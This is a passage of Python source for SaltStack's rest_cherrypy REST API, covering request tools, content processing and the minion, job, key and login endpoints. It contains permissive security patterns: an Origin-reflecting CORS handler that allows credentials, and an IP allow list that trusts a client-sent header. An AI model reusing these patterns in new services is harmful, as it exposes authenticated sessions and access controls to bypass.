around 30 to 50 concurrent connections.
That number of long-running, synchronous Salt processes is also not ideal. Like
at the CLI, each Salt command run will start a process that instantiates its
own ``LocalClient``, which instantiates its own listener to the Salt event bus,
and sends out its own periodic ``saltutil.find_job`` queries to determine if a
Minion is still running the command. Not exactly a lightweight operation.
Timeouts
--------
In addition to the above resource overhead for long-running connections, there
are the usual HTTP timeout semantics for the CherryPy server, any HTTP client
being used, as well as any hardware in between such as proxies, gateways, or
load balancers. rest_cherrypy can be configured not to time-out long responses
via the ``expire_responses`` setting, and both :py:class:`LocalClient
<salt.client.LocalClient>` and :py:class:`RunnerClient
<salt.runner.RunnerClient>` have their own timeout parameters that may be
passed as top-level keywords:
.. code-block:: bash
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.sleep",
"kwarg": {"length": 30},
"timeout": 60
},
{
"client": "runner",
"fun": "test.sleep",
"kwarg": {"s_time": 30},
"timeout": 60
}
]
'
Best Practices
--------------
Given the performance overhead and HTTP timeouts for long-running operations
described above, the most effective and most scalable way to use both Salt and
salt-api is to run commands asynchronously using the ``local_async``,
``runner_async``, and ``wheel_async`` clients.
Running asynchronous jobs results in being able to process 3x more commands per second
for ``LocalClient`` and 17x more commands per second for ``RunnerClient``, in
addition to much less network traffic and memory requirements. Job returns can
be fetched from Salt's job cache via the ``/jobs/<jid>`` endpoint, or they can
be collected into a data store using Salt's :ref:`Returner system <returners>`.
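As a sketch building on the :program:`requests` session from the
authentication example above (the job ID and the exact shape of the return
data are illustrative and vary by Salt version):

.. code-block:: python

    >>> resp = session.post('http://localhost:8000', json=[{
        'client': 'local_async',
        'tgt': '*',
        'fun': 'test.ping',
    }])
    >>> jid = resp.json()['return'][0]['jid']
    >>> session.get('http://localhost:8000/jobs/' + jid).json()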
The ``/events`` endpoint is specifically designed to handle long-running HTTP
connections and it exposes Salt's event bus which includes job returns.
Watching this endpoint first, then executing asynchronous Salt commands second,
is the most lightweight and scalable way to use ``rest_cherrypy`` while still
receiving job returns in real-time. But this requires clients that can properly
handle the inherent asynchronicity of that workflow.
Performance Tuning
------------------
The ``thread_pool`` and ``socket_queue_size`` settings can be used to increase
the capacity of rest_cherrypy to handle incoming requests. Keep an eye on RAM
usage as well as available file handles while testing changes to these
settings. As salt-api is a thin wrapper around Salt's Python API, also keep an
eye on the performance of Salt when testing.
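For instance, a starting point for a busier deployment might look like the
following (illustrative values; tune them against observed RAM and
file-handle usage):

.. code-block:: yaml

    rest_cherrypy:
        port: 8000
        thread_pool: 200
        socket_queue_size: 50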
Future Plans
------------
Now that Salt uses the Tornado concurrency library internally, we plan to
improve performance in the API by taking advantage of existing processes and
event listeners and to use lightweight coroutines to facilitate more
simultaneous HTTP connections and better support for synchronous operations.
That effort can be tracked in `issue 26505`__, but until that issue is closed
rest_cherrypy will remain the officially recommended REST API.
.. __: https://github.com/saltstack/salt/issues/26505
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |400| replace:: bad or malformed request
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
"""
from __future__ import absolute_import
import functools
import io
import itertools
import logging
import os
import signal
import tarfile
from collections.abc import Iterator, Mapping
from multiprocessing import Pipe, Process
import cherrypy # pylint: disable=import-error,3rd-party-module-not-gated
import salt
import salt.auth
import salt.exceptions
import salt.netapi
import salt.utils.event
import salt.utils.json
import salt.utils.stringutils
import salt.utils.versions
import salt.utils.yaml
logger = logging.getLogger(__name__)
try:
from cherrypy.lib import ( # pylint: disable=import-error,3rd-party-module-not-gated
cpstats,
)
except AttributeError:
cpstats = None
logger.warning(
"Import of cherrypy.cpstats failed. "
"Possible upstream bug: "
"https://github.com/cherrypy/cherrypy/issues/1444"
)
except ImportError:
cpstats = None
logger.warn("Import of cherrypy.cpstats failed.")
try:
# Imports related to websocket
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type("websockets", (object,), {"SynchronizingWebsocket": None})
HAS_WEBSOCKETS = False
def html_override_tool():
"""
Bypass the normal handler and serve HTML for all URLs
The ``app_path`` setting must be non-empty and the request must ask for
``text/html`` in the ``Accept`` header.
"""
apiopts = cherrypy.config["apiopts"]
request = cherrypy.request
url_blacklist = (
apiopts.get("app_path", "/app"),
apiopts.get("static_path", "/static"),
)
if "app" not in cherrypy.config["apiopts"]:
return
if request.path_info.startswith(url_blacklist):
return
if request.headers.get("Accept") == "*/*":
return
try:
wants_html = cherrypy.lib.cptools.accept("text/html")
except cherrypy.HTTPError:
return
else:
if wants_html != "text/html":
return
raise cherrypy.InternalRedirect(apiopts.get("app_path", "/app"))
def salt_token_tool():
"""
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
"""
x_auth = cherrypy.request.headers.get("X-Auth-Token", None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie["session_id"] = x_auth
def salt_api_acl_tool(username, request):
"""
.. versionadded:: 2016.3.0
Verifies user requests against the API whitelist. (User/IP pair)
in order to provide whitelisting for the API similar to the
master, but over the API.
.. code-block:: yaml
rest_cherrypy:
api_acl:
users:
'*':
- 1.1.1.1
- 1.1.1.2
foo:
- 8.8.4.4
bar:
- '*'
:param username: Username to check against the API.
:type username: str
:param request: Cherrypy request to check against the API.
:type request: cherrypy.request
"""
failure_str = "[api_acl] Authentication failed for " "user {0} from IP {1}"
success_str = "[api_acl] Authentication successful for user {0} from IP {1}"
pass_str = "[api_acl] Authentication not checked for " "user {0} from IP {1}"
acl = None
# Salt Configuration
salt_config = cherrypy.config.get("saltopts", None)
if salt_config:
# Cherrypy Config.
cherrypy_conf = salt_config.get("rest_cherrypy", None)
if cherrypy_conf:
# ACL Config.
acl = cherrypy_conf.get("api_acl", None)
ip = request.remote.ip
if acl:
users = acl.get("users", {})
if users:
if username in users:
if ip in users[username] or "*" in users[username]:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
elif username not in users and "*" in users:
if ip in users["*"] or "*" in users["*"]:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(pass_str.format(username, ip))
return True
def salt_ip_verify_tool():
"""
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
"""
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get("saltopts", None)
if salt_config:
cherrypy_conf = salt_config.get("rest_cherrypy", None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get("authorized_ips", None)
if auth_ip_list:
logger.debug("Found IP list: {0}".format(auth_ip_list))
rem_ip = cherrypy.request.headers.get("Remote-Addr", None)
logger.debug("Request from IP: {0}".format(rem_ip))
if rem_ip not in auth_ip_list:
logger.error("Blocked IP: {0}".format(rem_ip))
raise cherrypy.HTTPError(403, "Bad IP")
def salt_auth_tool():
"""
Redirect all unauthenticated requests to the login page
"""
# Redirect to the login page if the session hasn't been authed
if "token" not in cherrypy.session: # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers["Cache-Control"] = "private"
def cors_tool():
"""
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
"""
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head["Access-Control-Allow-Origin"] = req_head.get("Origin", "*")
resp_head["Access-Control-Expose-Headers"] = "GET, POST"
resp_head["Access-Control-Allow-Credentials"] = "true"
# Non-simple CORS preflight request; short-circuit the normal handler.
if cherrypy.request.method == "OPTIONS":
ac_method = req_head.get("Access-Control-Request-Method", None)
allowed_methods = ["GET", "POST"]
allowed_headers = [
"Content-Type",
"X-Auth-Token",
"X-Requested-With",
]
if ac_method and ac_method in allowed_methods:
resp_head["Access-Control-Allow-Methods"] = ", ".join(allowed_methods)
resp_head["Access-Control-Allow-Headers"] = ", ".join(allowed_headers)
resp_head["Connection"] = "keep-alive"
resp_head["Access-Control-Max-Age"] = "1400"
# Note: CherryPy on Py3 uses binary objects for the response
# Python 2.6 also supports the byte prefix, so no need for conditionals
cherrypy.response.body = b""
cherrypy.response.status = 200
# CORS requests should short-circuit the other tools.
cherrypy.serving.request.handler = None
# Needed to avoid the auth_tool check.
if cherrypy.request.config.get("tools.sessions.on", False):
cherrypy.session["token"] = True
return True
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
("application/json", salt.utils.json.dumps),
(
"application/x-yaml",
functools.partial(salt.utils.yaml.safe_dump, default_flow_style=False),
),
)
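# For example, a request sent with "Accept: application/x-yaml" is serialized
# with salt.utils.yaml.safe_dump, while "application/json" (the first, and
# therefore preferred, entry) uses salt.utils.json.dumps.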
def hypermedia_handler(*args, **kwargs):
"""
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
"""
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (
salt.exceptions.AuthenticationError,
salt.exceptions.AuthorizationError,
salt.exceptions.EauthAuthenticationError,
salt.exceptions.TokenAuthenticationError,
):
raise cherrypy.HTTPError(401)
except salt.exceptions.SaltInvocationError:
raise cherrypy.HTTPError(400)
except (
salt.exceptions.SaltDaemonNotRunning,
salt.exceptions.SaltReqTimeoutError,
) as exc:
raise cherrypy.HTTPError(503, exc.strerror)
except salt.exceptions.SaltClientTimeout:
raise cherrypy.HTTPError(504)
except cherrypy.CherryPyException:
raise
except Exception as exc: # pylint: disable=broad-except
# The TimeoutError exception class was removed in CherryPy in 12.0.0, but
# Still check existence of TimeoutError and handle in CherryPy < 12.
# The check was moved down from the SaltClientTimeout error line because
# A one-line if statement throws a BaseException inheritance TypeError.
if hasattr(cherrypy, "TimeoutError") and isinstance(exc, cherrypy.TimeoutError):
raise cherrypy.HTTPError(504)
import traceback
logger.debug(
"Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True,
)
cherrypy.response.status = 500
ret = {
"status": cherrypy.response.status,
"return": "{0}".format(traceback.format_exc(exc))
if cherrypy.config["debug"]
else "An unexpected error occurred",
}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers["Content-Type"] = best
out = cherrypy.response.processors[best]
try:
response = out(ret)
return salt.utils.stringutils.to_bytes(response)
except Exception: # pylint: disable=broad-except
msg = "Could not serialize the return data from Salt."
logger.debug(msg, exc_info=True)
raise cherrypy.HTTPError(500, msg)
def hypermedia_out():
"""
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
"""
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
# If handler has been explicitly set to None, don't override.
if request.handler is not None:
request.handler = hypermedia_handler
def process_request_body(fn):
"""
A decorator to skip a processor function if process_request_body is False
"""
@functools.wraps(fn)
def wrapped(*args, **kwargs): # pylint: disable=C0111
if cherrypy.request.process_request_body is not False:
fn(*args, **kwargs)
return wrapped
def urlencoded_processor(entity):
"""
Accept x-www-form-urlencoded data (run through CherryPy's formatter)
and reformat it into a Low State data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
"""
# First call out to CherryPy's default processor
cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy.serving.request.unserialized_data = entity.params
cherrypy.serving.request.raw_body = ""
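
# Editor's illustrative sketch (not part of the upstream module): roughly what
# the form-encoded body above looks like once parsed. urllib.parse.parse_qs is
# only an approximation of CherryPy's processor (parse_qs always wraps values
# in lists, while CherryPy only does so for repeated keys), but it shows why
# repeated -d arg=... flags arrive as a list.
def _demo_urlencoded_parse():
    from urllib.parse import parse_qs

    raw = "client=local&tgt=*&fun=test.kwarg&arg=one%3D1&arg=two%3D2"
    params = parse_qs(raw)
    # {'client': ['local'], 'tgt': ['*'], 'fun': ['test.kwarg'],
    #  'arg': ['one=1', 'two=2']}
    return params
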
@process_request_body
def json_processor(entity):
"""
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
"""
# https://github.com/cherrypy/cherrypy/pull/1572
contents = io.BytesIO()
    entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
del contents
try:
cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, "Invalid JSON document")
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
"""
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
"""
# https://github.com/cherrypy/cherrypy/pull/1572
contents = io.BytesIO()
    entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
try:
cherrypy.serving.request.unserialized_data = salt.utils.yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, "Invalid YAML document")
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
"""
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
"""
# https://github.com/cherrypy/cherrypy/pull/1572
contents = io.BytesIO()
    entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
try:
cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
"""
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
"""
# Be liberal in what you accept
ct_in_map = {
"application/x-www-form-urlencoded": urlencoded_processor,
"application/json": json_processor,
"application/x-yaml": yaml_processor,
"text/yaml": yaml_processor,
"text/plain": text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (
cherrypy.request.method.upper() == "POST"
and cherrypy.request.headers.get("Content-Length", "0") == "0"
):
cherrypy.request.process_request_body = False
cherrypy.request.unserialized_data = None
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, "Content type not supported"
)
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
"""
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
"""
if cherrypy.request.method.upper() != "POST":
return
data = cherrypy.request.unserialized_data
    # If the data was sent urlencoded, we need to make it a list.
    # This is a forgiving implementation, as different clients set different
    # headers for form-encoded data (including a charset or similar).
if data and isinstance(data, Mapping):
# Make the 'arg' param a list if not already
if "arg" in data and not isinstance(
data["arg"], list
): # pylint: disable=unsupported-membership-test
data["arg"] = [data["arg"]]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
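
# Editor's illustrative sketch (not part of the upstream module): the 'arg'
# normalization performed by lowdata_fmt above, using hypothetical sample
# data such as a form-encoded POST would produce.
def _demo_lowdata_fmt():
    data = {"client": "local", "tgt": "*", "fun": "test.arg", "arg": "one"}
    if "arg" in data and not isinstance(data["arg"], list):
        data["arg"] = [data["arg"]]
    lowstate = [data]
    # [{'client': 'local', 'tgt': '*', 'fun': 'test.arg', 'arg': ['one']}]
    return lowstate
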
tools_config = {
"on_start_resource": [
("html_override", html_override_tool),
("salt_token", salt_token_tool),
],
"before_request_body": [
("cors_tool", cors_tool),
("salt_auth", salt_auth_tool),
("hypermedia_in", hypermedia_in),
],
"before_handler": [
("lowdata_fmt", lowdata_fmt),
("hypermedia_out", hypermedia_out),
("salt_ip_verify", salt_ip_verify_tool),
],
}
for hook, tool_list in tools_config.items():
for idx, tool_config in enumerate(tool_list):
tool_name, tool_fn = tool_config
setattr(
cherrypy.tools, tool_name, cherrypy.Tool(hook, tool_fn, priority=(50 + idx))
)
###############################################################################
class LowDataAdapter(object):
"""
The primary entry point to Salt's REST API
"""
exposed = True
_cp_config = {
"tools.salt_token.on": True,
"tools.sessions.on": True,
"tools.sessions.timeout": 60 * 10, # 10 hours
# 'tools.autovary.on': True,
"tools.hypermedia_out.on": True,
"tools.hypermedia_in.on": True,
"tools.lowdata_fmt.on": True,
"tools.salt_ip_verify.on": True,
}
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.apiopts = cherrypy.config["apiopts"]
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
"""
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
"""
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get("tools.sessions.on", False):
cherrypy.session.release_lock()
        # If the loaded lowstate isn't a list, notify the client
if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, "Lowstates must be a list")
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk["token"] = token
if "token" in chunk:
# Make sure that auth token is hex
try:
int(chunk["token"], 16)
except (TypeError, ValueError):
raise cherrypy.HTTPError(401, "Invalid token")
if "token" in chunk:
# Make sure that auth token is hex
try:
int(chunk["token"], 16)
except (TypeError, ValueError):
raise cherrypy.HTTPError(401, "Invalid token")
if client:
chunk["client"] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if "arg" in chunk and not isinstance(chunk["arg"], list):
chunk["arg"] = [chunk["arg"]]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, Iterator):
for i in ret:
yield i
else:
yield ret
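    # Editor's note: a lowstate chunk consumed by exec_lowstate is a plain
    # dict, for example (hypothetical values):
    #     {"client": "local", "tgt": "*", "fun": "test.ping",
    #      "token": "d40d1e1e"}
    # The session token, when present, is injected into every chunk before
    # the chunk is handed to self.api.run().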
@cherrypy.config(**{"tools.sessions.on": False})
def GET(self):
"""
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: text
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
"""
return {
"return": "Welcome",
"clients": salt.netapi.CLIENTS,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
"""
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-H "Content-type: application/json" \\
-d '[{"client": "local", "tgt": "*", "fun": "test.ping"}]'
.. code-block:: text
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping"}]
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
"""
return {"return": list(self.exec_lowstate(token=cherrypy.session.get("token")))}
class Minions(LowDataAdapter):
"""
Convenience URLs for working with minions
"""
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})
def GET(self, mid=None): # pylint: disable=arguments-differ
"""
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: text
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
"""
cherrypy.request.lowstate = [
{"client": "local", "tgt": mid or "*", "fun": "grains.items"}
]
return {
"return": list(self.exec_lowstate(token=cherrypy.session.get("token"))),
}
def POST(self, **kwargs):
"""
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
Lowstate data describing Salt commands must be sent in the request
body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-d '[{"tgt": "*", "fun": "status.diskusage"}]'
.. code-block:: text
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Type: application/json
tgt=*&fun=status.diskusage
**Example response:**
.. code-block:: text
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
"""
job_data = list(
self.exec_lowstate(
client="local_async", token=cherrypy.session.get("token")
)
)
cherrypy.response.status = 202
return {
"return": job_data,
"_links": {
"jobs": [{"href": "/jobs/{0}".format(i["jid"])} for i in job_data if i],
},
}
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})
def GET(self, jid=None, timeout=""): # pylint: disable=arguments-differ
"""
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: text
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: text
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
"""
lowstate = {"client": "runner"}
if jid:
lowstate.update({"fun": "jobs.list_job", "jid": jid})
else:
lowstate.update({"fun": "jobs.list_jobs"})
cherrypy.request.lowstate = [lowstate]
job_ret_info = list(self.exec_lowstate(token=cherrypy.session.get("token")))
ret = {}
if jid:
ret["info"] = [job_ret_info[0]]
minion_ret = {}
            returns = job_ret_info[0].get("Result")
            for minion in returns:
                minion_ret[minion] = returns[minion].get("return")
ret["return"] = [minion_ret]
else:
ret["return"] = [job_ret_info[0]]
return ret
class Keys(LowDataAdapter):
"""
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the :py:mod:`key wheel
module <salt.wheel.key>` functions.
"""
def GET(self, mid=None): # pylint: disable=arguments-differ
"""
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: text
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: text
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
"""
if mid:
lowstate = [{"client": "wheel", "fun": "key.finger", "match": mid}]
else:
lowstate = [{"client": "wheel", "fun": "key.list_all"}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get("token"))
return {"return": next(result, {}).get("data", {}).get("return", {})}
@cherrypy.config(**{"tools.hypermedia_out.on": False, "tools.sessions.on": False})
def POST(self, **kwargs):
r"""
Easily generate keys for a minion and auto-accept the new key
Accepts all the same parameters as the :py:func:`key.gen_accept
<salt.wheel.key.gen_accept>`.
.. note:: A note about ``curl``
Avoid using the ``-i`` flag or HTTP headers will be written and
produce an invalid tar file.
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: text
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
"""
lowstate = cherrypy.request.lowstate
lowstate[0].update({"client": "wheel", "fun": "key.gen_accept"})
if "mid" in lowstate[0]:
lowstate[0]["id_"] = lowstate[0].pop("mid")
result = self.exec_lowstate()
ret = next(result, {}).get("data", {}).get("return", {})
pub_key = ret.get("pub", "")
pub_key_file = tarfile.TarInfo("minion.pub")
pub_key_file.size = len(pub_key)
priv_key = ret.get("priv", "")
priv_key_file = tarfile.TarInfo("minion.pem")
priv_key_file.size = len(priv_key)
fileobj = io.BytesIO()
tarball = tarfile.open(fileobj=fileobj, mode="w")
pub_key = pub_key.encode(__salt_system_encoding__)
priv_key = priv_key.encode(__salt_system_encoding__)
tarball.addfile(pub_key_file, io.BytesIO(pub_key))
tarball.addfile(priv_key_file, io.BytesIO(priv_key))
tarball.close()
headers = cherrypy.response.headers
headers[
"Content-Disposition"
] = 'attachment; filename="saltkeys-{0}.tar"'.format(lowstate[0]["id_"])
headers["Content-Type"] = "application/x-tar"
headers["Content-Length"] = len(fileobj.getvalue())
headers["Cache-Control"] = "no-cache"
fileobj.seek(0)
return fileobj
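
# Editor's illustrative sketch (not part of the upstream module): reading the
# tarball returned by Keys.POST entirely in memory, mirroring how it is built
# above. The tar_bytes payload is hypothetical (e.g. a saved response body).
def _demo_read_keys_tarball(tar_bytes):
    import io
    import tarfile

    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tarball:
        members = {m.name: tarball.extractfile(m).read() for m in tarball}
    # Expected member names, per the code above: 'minion.pub' and 'minion.pem'
    return members
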
class Login(LowDataAdapter):
"""
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
"""
def __init__(self, *args, **kwargs):
super(Login, self).__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
"""
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: text
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: text/html
"""
cherrypy.response.headers["WWW-Authenticate"] = "Session"
return {
"status": cherrypy.response.status,
"return": "Please log in",
}
def POST(self, **kwargs):
"""
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
